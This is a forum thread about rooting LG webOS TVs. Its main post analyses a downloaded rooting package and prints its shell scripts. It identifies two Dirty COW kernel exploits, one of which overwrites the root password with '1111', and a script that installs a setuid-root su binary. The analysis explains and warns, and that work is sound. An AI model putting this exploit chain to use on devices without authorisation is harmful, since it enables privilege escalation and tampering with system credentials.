Results 1 to 6 of 6
Like Tree16Likes
  • 14 Post By rwhitby
  • 2 Post By dkirker
  1.    #1  
    A source informs us that instructions have been published on gaining root access to a webOS TV. This is much harder than on the old phones and tablets. When this was done on legacy webOS, there was a wave of enhancements and tweaks made available to phone users from webOS Internals and other developers.

    Read more...

    NOTE: As stated in the article and original thread, this has the potential to brick your TV and void your warranty, which given the prices of the higher end TVs, could prove extremely expensive. Do not try this unless you are very sure of what you are doing and at your own risk.
    Last edited by Preemptive; 11/22/2017 at 01:17 PM.
  2. #2  
    I've done an analysis of the root access method described at http://webos-forums.ru/topic4650.html ...

    Disclaimer: I do not have a webOS TV and have not attemped or verified these steps.

    There are 12 steps to the procedure:

    Steps 1, 2 and 3 are all about setting up a developer account, installing a Developer Mode application on your device, enabling Dev Mode Status and Key Server switches, and gaining SSH developer access to your device.

    Step 4 involves downloading a file from http://zalil.su/6937580 - you should be wary of downloading executables from random sites and executing them on your device.

    Steps 5 through 7 detail how to get this file onto your device.

    Steps 8 through 12 are running the script and getting the root shell.

    So, let's look at things in more detail ...

    The downloaded file is a shell script containing an embedded binary archive:
    Code:
    #!/bin/bash
    uuencode=0
    binary=1
    match=$(grep -n '^PAYLOAD:$' $0 | cut -d ':' -f 1)
    payload_start=$((match + 1))
    if [[ $binary -ne 0 ]]; then
            tail -n +$payload_start $0 | tar -xzvf - > /dev/null
    fi
    chmod +x *
    ./rt.sh
    rm firstg
    rm secstg
    rm rt.sh
    rm su
    rm rep
    exit 0
    PAYLOAD:
    <... lots of binary encoded data ...>
    The way to extract the archive is to cut all of the data after the PAYLOAD: line, and insert it into a file with a .tar.gz extension.

    Here is the contents of the archive:
    Code:
    $ tar ztvf ~/Downloads/6937580_root.tar.gz 
    drwxrwxrwx  0 root   root        0 Jul 28 16:21 ./
    -rwxrwxrwx  0 5482   5000      168 Jul 28 15:20 ./rep
    -rwxrwxrwx  0 5482   5000      416 Jul 28 15:35 ./rt.sh
    -rwxrwxrwx  0 5482   5000    39987 Jul 28 15:19 ./secstg
    -rwxrwxrwx  0 5482   5000    11052 Jul 28 15:24 ./su
    -rwxrwxrwx  0 5482   5000    16236 Jul 28 15:19 ./firstg
    Let's look at each file individually:
    • rt.sh - a shell script which sequences the rooting procedure
    • firstg - a binary executable
    • rep - a shell script which copies the su executable from /var/palm/jail/com.palm.devmode.openssh/media/developer/su to /dev/shm/test/su and changes ownership of the su executable to root
    • secstg - a binary executable
    • su - looks like the standard su program from busybox


    Let's take a deeper look at rt.sh:
    Code:
    #!/bin/sh
    echo "first stage"
    ./firstg /usr/bin/ApplicationInstallerUtility rep > /dev/null 2>&1
    sleep 2
    echo "second stage"
    ./secstg > /dev/null 2>&1
    sleep 2
    echo "third stage - "
    echo "try install any app from market"
    echo "wait..."
    while [ ! -f /dev/shm/test/su ]
    do
      sleep 2
      echo "try install any app from market"
    done
    sleep 1
    echo "third stage ok"
    echo "try get root - input password 1111"
    /dev/shm/test/su
    The firstg binary contains the following interesting strings:
    Code:
    usage: dirtyc0w target_file new_content
    GCC: (crosstool-NG linaro-1.13.1+bzr2709 - Linaro GCC 2014.11) 4.9.3 20141031 (prerelease)
    GNU C 4.9.3 20141031 (prerelease) -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -mlittle-endian -mtune=cortex-a9 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
    /home/christopher/Development/linaro/.build/src/eglibc-linaro-2.19-2014.08/...
    /home/christopher/Development/linaro/.build/src/gcc-linaro-4.9-2014.11/...
    /home/evgen/dev/arm-linux-gnueabi-linaro_4.9.3-2014.11/...
    crtstuff.c
    dirtycow.c
    elf-init.c
    fstat.c
    The dirtyc0w program name referenced in the usage string indicates that this is Dirty COW (CVE-2016-5195), a privilege escalation vulnerability in the Linux Kernel. See https://dirtycow.ninja/ for more details on Dirty Cow.

    So firstg seems to be the canned exploit found at https://github.com/dirtycow/dirtycow...ter/dirtyc0w.c and the intent of the firstg call is to insert the contents of the rep script into the /usr/bin/ApplicationInstallerUtility binary.

    So let's look at the rep script:
    Code:
    #!/bin/sh
    mkdir /dev/shm/test
    cp /var/palm/jail/com.palm.devmode.openssh/media/developer/su /dev/shm/test/
    chown root:root /dev/shm/test/su
    chmod u+s /dev/shm/test/su
    This takes the su binary which was unpacked in the openssh jail /media/developer directory, and places it in /dev/shm/test/ with root privileges.

    The secstg binary contains the following interesting strings:
    Code:
    $ strings secstg 
    /tmp/.ssh_bak
    ./.ssh_bak
    root:
    WejG7Q39pocco
    sshd:
    /etc/passwd
     [-s] [-n] | [-h]
     -s  open directly a shell, if the exploit is successful;
     -n  combined with -s, doesn't restore the passwd file.
     -h  print this synopsis;
     If no param is specified, the program modifies the passwd file and exits.
     A copy of the passwd file will be create in the current directory as .ssh_bak
     (unprivileged user), if no parameter or -n is specified.
    Password overridden to: 
    1111
    Root password is:   
    Enjoy! :-)
    /home/tcwg-buildslave/workspace/tcwg-make-release/label/tcwg-x86_64-ex40/...
    GNU C 4.9.4 20151028 (prerelease) -march=armv7-a -mtune=cortex-a9 -mfloat-abi=softfp -mfpu=vfpv3-d16 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
    /home/evgen/dev/toolchains/gcc-linaro-4.9-2016.02-x86_64_arm-linux-gnueabi/...
    So secstg seems to be the canned exploit found at https://github.com/gbonacini/CVE-201...aster/dcow.cpp and the intent of the secstg call is to change the root password to "1111".

    The rest of the rt.sh script then asks the user to install any application (which then causes the modified /usr/bin/ApplicationInstallerUtility binary to be called, which copies the su binary to a shared location accessible by the script, gives it root privileges and then executes it. The user then provides the new root password and is presented with a root shell.

    -- Rod
    Last edited by rwhitby; 08/12/2017 at 09:56 PM.
    WebOS Internals and Preware Founder and Developer
    You may wish to donate by Paypal to donations @ webos-internals.org if you find our work useful.
    All donations go back into development.
    www.webos-internals.org twitter.com/webosinternals facebook.com/webosinternals
  3. #3  
    Hello!
    I'm from webos-forums.ru. I've root on TV for a while and can help you with translation or testing on LG webOS 1.4.
  4. #4  
    Quite interesting! Thanks for the analysis, Rod! (Also, nice to still see you around. )
    Did you know:

    webOS ran on a Treo 800 during initial development.
    hfGermany and gazaud like this.
  5. ashi's Avatar
    Posts
    203 Posts
    Global Posts
    204 Global Posts
    #5  
    Nice, I just ordered a 49" LG with WebOS. I don't know what I'll be able to tweak if anything, but rooting it sounds fun.
  6. #6  

    I want to install applications outside the store lg

Similar Threads

  1. pivotce: LuneOS July Stable Release: Cortado
    By webOS Ports in forum LuneOS
    Replies: 13
    Last Post: 10/02/2017, 12:52 AM
  2. Replies: 0
    Last Post: 08/11/2017, 09:35 AM
  3. Replies: 0
    Last Post: 08/10/2017, 12:13 AM
  4. SlingTV app WebOS 3.0 - How-To or instructions?
    By elkcaps in forum LG webOS TV
    Replies: 0
    Last Post: 08/02/2017, 10:16 AM
  5. Migrating from pre3/webOS to Android - need help
    By dreamseekeroo in forum HP Pre 3
    Replies: 2
    Last Post: 07/23/2017, 08:04 PM

Posting Permissions